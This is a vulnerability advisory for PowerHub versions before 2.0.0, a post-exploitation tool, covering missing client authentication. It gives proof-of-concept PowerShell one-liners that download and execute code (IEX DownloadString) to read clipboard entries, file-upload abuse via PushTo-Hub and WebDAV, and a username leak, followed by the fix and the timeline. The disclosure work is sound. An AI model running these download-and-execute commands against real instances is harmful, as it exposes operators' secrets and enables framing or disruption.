Security vulnerability
General information | |
---|---|
Vulnerability type | Missing authentication / Information Disclosure |
Affected product | https://github.com/AdrianVollmer/PowerHub |
Reporter | security-research@six-two.dev |
Affected version(s) | < 2.0.0 |
Fixed version | 2.0.0 |
Short summary
The PowerHub software does not verify clients. This allows malicious actors to connect to a PowerHub instance as a client, read clipboard entries, obtain the name of the user running PowerHub, upload files and download modules (which may contain proprietary code). Attackers can also use publicly accessible PowerHub instances in their own attacks, which may be used to frame the operator of the server PowerHub is running on.
Recommendation
Client authentication
I would recommend adding a secret token variable to the launcher code:
$T='RandomSecretToken'; $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}
The token variable's contents can then be used to authenticate any requests performed by the client.
The token may be passed as a HTTP-header. Alternatively an HMAC over the requests body could be created and used to verify that the client knows the secret:
VerificationToken = HMAC(Token, HttpBody)
Prevent username leak
It is recommended to remove the username from the List-HubModules
command output. Ideally only relative paths, such as ./custom.ps1
would be used.
Reproduction / Proof of Concept(s)
Due to time restraints, I have not actually developed an easy way to read the modules, clipboard entries, etc. However, since the PowerShell executes the code it should be possible to obtain this data by attaching a debugger or writing a custom client based on the source code of PowerHub.
Testing environment
As the target I used PowerHub installed on my host (Linux) via pip:
$ pip install powerhub
$ pip show powerhub
Name: PowerHub
Version: 1.11
[...]
As my attacker's machine I used a Windows VM. The VM was connected to the host via the Bridged Adapter
option of VirtualBox.
Setup
Victim
- Start PowerHub:
powerhub 192.168.0.116 --auth user:password
- Login to the web interface and add two clipboard entry.
- Create a custom module (
~/.local/share/powerhub/modules/custom.ps1
)
Attacker
- Run a local PowerHub instance, login to the web interface and grab the commands to execute on the client. Replace the local address and port with those of the victim.
- Execute these commands in a Windows PowerShell.
(1) Reading clipboard entries
Clipboard entries might be used to store sensitive information (such as command output containing hashes, passwords) to make it easily available on multiple machines. Or it may contain proprietary code, that is not intended to be leaked.
Clipboard entries are referenced by a counter, which makes them trivial to enumerate.
Clipboard entry 1:
$K=New-Object Net.WebClient;'a=reflection','t=http&c=1'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}
Clipboard entry 2:
$K=New-Object Net.WebClient;'a=reflection','t=http&c=2'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}
(2) Uploading files
Using the PushTo-Hub
command, clients can upload files to the PowerHub server. Attackers may use this to fill the servers disk space (which may affect system availability) or upload illegal contents to frame the victim.
PS C:\Users\Admin> $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}
True
_____ _____ _ _ _ _______ ______ _ _ _ _ ______
|_____] | | | | | |______ |_____/ |_____| | | |_____]
| |_____| |__|__| |______ | \_ | | |_____| |_____]
1.11 written by Adrian Vollmer, 2018-2022
Run 'Help-PowerHub' for help
PS C:\Users\Admin> PushTo-Hub C:\Users\Admin\Desktop\hacked.txt
Similarly the Mount-Webdav
functionality can be used to upload files. However, this may also be used to distribute illegal contents, since attackers have read/write access to certain folders.
PS C:\Users\Admin> Mount-Webdav
PS C:\Users\Admin>
Files stored on the server (victim):
$ tree ~/.local/share/powerhub -h
[...]
├── [4.0K] upload
│ └── [ 20] hacked.txt
├── [4.0K] webdav
│ ├── [4.0K] blackhole
│ ├── [5.9K] New Text Document.txt
│ └── [4.0K] public
│ └── [ 4] New Text Document.txt
[...]
(3) Listing and downloading modules
Clients can obtain a list of modules (PowerShell and executables). Attackers may use this fact to download modules from the server. If these modules contain confidential data (such as proprietary exploits or credentials for backdoors) these data can be accessed by anyone.
PS C:\Users\Admin> lshm
N Type Name Loaded
- ---- ---- ------
0 ps1 /home/REDACTED/.local/share/powerhub/modules/custom.ps1 False
PS C:\Users\Admin> lhm 1
PS C:\Users\Admin>
This call additionally reveals the user's name, which may be used to perform attacks such as SSH password guessing attacks.
Solution
The problems were fixed in version 2.0.0. The response from the developer explains it best:
Hi,
version 2.0.0 has now been released. It should now be impossible to find an endpoint that discloses clipboard entries without knowing the key. Finding the key without knowing it already should also be impossible. And even then, only clipboard entries that have been marked as "executable" will be disclosed. Thanks again for reporting.
Timeline
Action | Date |
---|---|
Vulnerabilities discovered | 2022-08-13 |
Vulnerabilities reported | 2022-08-15 |
Vulnerabilities resolved | 2023-02-26 |
Published this advisory | 2023-08-01 |
Note: The vulnerabilities were fixed as part of big rewrite (PowerHub Version 2), which is why the fix took a while to roll out.